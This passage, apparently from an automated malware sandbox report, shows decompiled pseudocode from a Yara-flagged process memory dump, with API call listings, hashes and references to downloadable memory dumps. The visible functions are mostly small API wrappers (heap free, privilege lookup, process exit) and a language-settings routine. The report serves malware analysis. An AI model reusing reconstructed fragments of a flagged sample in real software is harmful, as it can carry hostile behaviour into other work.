                                          												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                          												_a12 = _a12 + 0x224;
                                          												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
                                          												 *__ebx = 0x18;
                                          												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
                                          												__eax = E00419D50(__edi, _a12 + 0x224, 0x1a, __ebx, _t44);
                                          												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                          												__eflags = __eax;
                                          												if(__eax < 0) {
                                          													break;
                                          												} else {
                                          													__edx = _a8;
                                          													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                          													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                          													__eax = E0041B3F0(__ecx);
                                          													__ebx = __eax;
                                          													__eax =  *((intOrPtr*)(__ebx + 0x28));
                                          													__eax = E0041C0D0( *((intOrPtr*)(__ebx + 0x28)));
                                          													__edx =  *((intOrPtr*)(__ebx + 0x28));
                                          													_t59 = __eax + 2; // 0x2
                                          													__ecx = __eax + _t59;
                                          													__eax =  &_v656;
                                          													__eax = E00414A50(__edi,  &_v656, 2, 0); // executed
                                          													_pop(__edi);
                                          													_pop(__esi);
                                          													_pop(__ebx);
                                          													__esp = __ebp;
                                          													_pop(__ebp);
                                          													return __eax;
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										goto L13;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L21;
                                          					}
                                          					_pop(__edi);
                                          					_pop(__esi);
                                          					__eax = 0;
                                          					__eflags = 0;
                                          					_pop(__ebx);
                                          					__esp = __ebp;
                                          					_pop(__ebp);
                                          					return 0;
                                          				}
                                          				L21:
                                          			}





















                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 21c64e26b1d5ed772856a6d2b5f4544b7c2b723b138970cbbcd9895167361a24
                                          • Instruction ID: 136ec33444ff271f2d67ddc59ad6b24b8eb5b97cd6d39456900d21724dd85dd8
                                          • Opcode Fuzzy Hash: 21c64e26b1d5ed772856a6d2b5f4544b7c2b723b138970cbbcd9895167361a24
                                          • Instruction Fuzzy Hash: E6F0E23178133832E22115916D03FBE6B08DB81F65F14016EFF48F91C1E9E9281202EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                          				char _t10;
                                          				void* _t15;
                                          
                                          				_t3 = _a4 + 0xc74; // 0xc74
                                          				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}





                                          0x0041a67f
                                          0x0041a687
                                          0x0041a69d
                                          0x0041a6a1

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				int _t10;
                                          				void* _t15;
                                          
                                          				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}





                                          0x0041a7ea
                                          0x0041a800
                                          0x0041a804

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A6A2(intOrPtr _a4, int _a8) {
                                          				void* _t17;
                                          
                                          				 *0x555908dc =  *0x555908dc >> 1;
                                          				_t6 = _a4;
                                          				E0041AF60(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}




                                          0x0041a6ab
                                          0x0041a6b3
                                          0x0041a6ca
                                          0x0041a6d8

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: b22859cd8cde9127c43d838a16605f2588f6efb8e8f58cd72203cb807730f872
                                          • Instruction ID: 45c8ba8b1dbd29e5d4b6212f27cc3fcbf99be4086100888ebc46f86a6bd8a2f7
                                          • Opcode Fuzzy Hash: b22859cd8cde9127c43d838a16605f2588f6efb8e8f58cd72203cb807730f872
                                          • Instruction Fuzzy Hash: C6E04F71610204ABD324DF65CC85ED737B8EF49750F158099B9496F282C531A941CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A6B0(intOrPtr _a4, int _a8) {
                                          				void* _t10;
                                          
                                          				_t5 = _a4;
                                          				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}




                                          0x0041a6b3
                                          0x0041a6ca
                                          0x0041a6d8

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E00778788(signed int __ecx, void* __edx, signed int _a4) {
                                          				signed int _v8;
                                          				short* _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				char _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				void* _t216;
                                          				intOrPtr _t231;
                                          				short* _t235;
                                          				intOrPtr _t257;
                                          				short* _t261;
                                          				intOrPtr _t284;
                                          				intOrPtr _t288;
                                          				void* _t314;
                                          				signed int _t318;
                                          				short* _t319;
                                          				intOrPtr _t321;
                                          				void* _t328;
                                          				void* _t329;
                                          				char* _t332;
                                          				signed int _t333;
                                          				signed int* _t334;
                                          				void* _t335;
                                          				void* _t338;
                                          				void* _t339;
                                          
                                          				_t328 = __edx;
                                          				_t322 = __ecx;
                                          				_t318 = 0;
                                          				_t334 = _a4;
                                          				_v8 = 0;
                                          				_v28 = 0;
                                          				_v48 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v52 = 0;
                                          				if(_t334 == 0) {
                                          					_t329 = 0xc000000d;
                                          					L49:
                                          					_t334[0x11] = _v56;
                                          					 *_t334 =  *_t334 | 0x00000800;
                                          					_t334[0x12] = _v60;
                                          					_t334[0x13] = _v28;
                                          					_t334[0x17] = _v20;
                                          					_t334[0x16] = _v48;
                                          					_t334[0x18] = _v40;
                                          					_t334[0x14] = _v32;
                                          					_t334[0x15] = _v52;
                                          					return _t329;
                                          				}
                                          				_v56 = 0;
                                          				if(E00778460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						_t207 = E0075E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          					}
                                          					_push(1);
                                          					_v8 = _t318;
                                          					E0077718A(_t207);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_v60 = _v60 | 0xffffffff;
                                          				if(E00778460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_t333 =  *_v8;
                                          					_v60 = _t333;
                                          					_t314 = E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					_push(_t333);
                                          					_v8 = _t318;
                                          					E0077718A(_t314);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_t216 = E00778460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                          				_t332 = ";";
                                          				if(_t216 < 0) {
                                          					L17:
                                          					if(E00778460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                          						L30:
                                          						if(E00778460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                          							L46:
                                          							_t329 = 0;
                                          							L47:
                                          							if(_v8 != _t318) {
                                          								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          							}
                                          							if(_v28 != _t318) {
                                          								if(_v20 != _t318) {
                                          									E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          									_v20 = _t318;
                                          									_v40 = _t318;
                                          								}
                                          							}
                                          							goto L49;
                                          						}
                                          						_t231 = _v24;
                                          						_t322 = _t231 + 4;
                                          						_push(_t231);
                                          						_v52 = _t322;
                                          						E0077718A(_t231);
                                          						if(_t322 == _t318) {
                                          							_v32 = _t318;
                                          						} else {
                                          							_v32 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          						}
                                          						if(_v32 == _t318) {
                                          							_v52 = _t318;
                                          							L58:
                                          							_t329 = 0xc0000017;
                                          							goto L47;
                                          						} else {
                                          							E00752340(_v32, _v8, _v24);
                                          							_v16 = _v32;
                                          							_a4 = _t318;
                                          							_t235 = E0076E679(_v32, _t332);
                                          							while(1) {
                                          								_t319 = _t235;
                                          								if(_t319 == 0) {
                                          									break;
                                          								}
                                          								 *_t319 = 0;
                                          								_t321 = _t319 + 2;
                                          								E0075E2A8(_t322,  &_v68, _v16);
                                          								if(E00775553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          								_v16 = _t321;
                                          								_t235 = E0076E679(_t321, _t332);
                                          								_pop(_t322);
                                          							}
                                          							_t236 = _v16;
                                          							if( *_v16 != _t319) {
                                          								E0075E2A8(_t322,  &_v68, _t236);
                                          								if(E00775553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          							}
                                          							if(_a4 == 0) {
                                          								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                          								_v52 = _v52 & 0x00000000;
                                          								_v32 = _v32 & 0x00000000;
                                          							}
                                          							if(_v8 != 0) {
                                          								E0075E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          							}
                                          							_v8 = _v8 & 0x00000000;
                                          							_t318 = 0;
                                          							goto L46;
                                          						}
                                          					}
                                          					_t257 = _v24;
                                          					_t322 = _t257 + 4;
                                          					_push(_t257);
                                          					_v40 = _t322;
                                          					E0077718A(_t257);
                                          					_t338 = _t335 + 4;
                                          					if(_t322 == _t318) {
                                          						_v20 = _t318;
                                          					} else {
                                          						_v20 = E0075E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          					}
                                          					if(_v20 == _t318) {
                                          						_v40 = _t318;
                                          						goto L58;
                                          					} else {
                                          						E00752340(_v20, _v8, _v24);
                                          						_v16 = _v20;
                                          						_a4 = _t318;
                                          						_t261 = E0076E679(_v20, _t332);
                                          						_t335 = _t338 + 0x14;
                                          						while(1) {
                                          							_v12 = _t261;
                                          							if(_t261 == _t318) {
                                          								break;
                                          							}
                                          							_v12 = _v12 + 2;
